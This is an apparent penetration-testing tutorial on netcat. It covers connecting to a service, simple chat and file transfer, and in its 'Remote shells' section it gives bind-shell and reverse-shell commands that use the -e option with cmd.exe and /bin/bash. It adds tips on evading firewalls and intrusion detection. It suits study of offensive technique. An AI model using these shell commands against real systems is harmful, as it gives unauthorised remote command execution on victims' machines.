Netcat

Netcat is the most used networking tool to connect to sites, test connections, get remote shells and it can even be used to send and receive files. For that, we need netcat running on both machines. One will be the listener, and the other will connect to it.

Connect to an IP, at a certain port (-n numeric, only IP addresses, no DNS; -v verbose): nc -nv 192.168.1.100 80

Some services we connect to can greet us with a banner message, usually identifying the service, the versioin, etc. This lets us know the connection is successful. Then, usually we can interact with the service by supplying it with commands (typically, after a login with user and password) specific to that service (two caveats here: sometimes the "return" key alone doesn't work to send a command to the service, we may need to hit "return" twice, or add some kind of line ending (CR, LF, etc). Also, sometimes netcat is not the best tool for this. If the service is not responding to our commands, try with telnet and with ncat).

To establish a connection between two computers on port 4444 (sometimes certain ports are blocked, and it is important to try other ports. When this happens, normally all ports are filtered by a firewall except a few. Try using those, maybe we are lucky and they are not occupied at the moment. Port 443 tends to be successful in these cases): In the listener computer (with IP 192.168.1.100) we execute (-l to listen, -p to specify source port, here 4444): nc -nlvp 4444

In the client connecting to the listener: nc -nv 192.168.1.100 4444

An interactive session is open. What we type on one side appears on the other after pressing "return".

Files can also be sent. For example, if we want to transfer a file from the client to the listener (the name can be different), on the listener we have: nc -nlvp 4444 > a.txt An on the client: nc -nv 192.168.1.100 4444 < b.txt

=== Remote shells: ===

The most important use of netcat for hacking is that a program can be run on one side, normally the Windows command prompt, or the linux counterpart, to get a reverse shell. We indicate with the -e option the program to execute. To get a bind shell (the listener, which normally is the victim machine, "shares" its command prompt program, while the attacker, the client, connects to it) the victim (a windows machine with IP 192.168.1.100) executes: nc -nlvp 4444 -e cmd.exe

And doing directly from the client: nc -nv 192.168.1.100 4444 the client receives the bind shell. This method is considered less powerful than a reverse shell, since firewalls tend to block more incoming connections that outgoing, and in the bind shell the connection from the client is incoming.

To get a reverse shell connection, typically less likely to be blocked by a firewall (still, we may need to try different ports, depending on the target's firewall configuration), the attacker machine listens, and (by some other means, usually by some other vulnerability present in the victim, and exploited by the attacker while he listens for the incoming connection), the victim connects to the attacker and also executes its own command line, which is served to the attacker. The attacker (with IP 192.168.1.101) listens passively with: nc -nlvp 4444 And forces the victim (which in this case is linux) to execute: nc -nv 192.168.1.101 4444 -e /bin/bash

Commands can be typed on the attacker, and the victim will execute them and send the output back, so the attacker has a remote command execution method, as long as the session is open.

Caution: netcat does NOT encrypt traffic nor asks for authentication. This can be a drawback if Intrusion Detection Systems (IDS) are present on the victim or on the network. To solve this we have the Ncat program, as a part of the Nmap project, which allows encryption.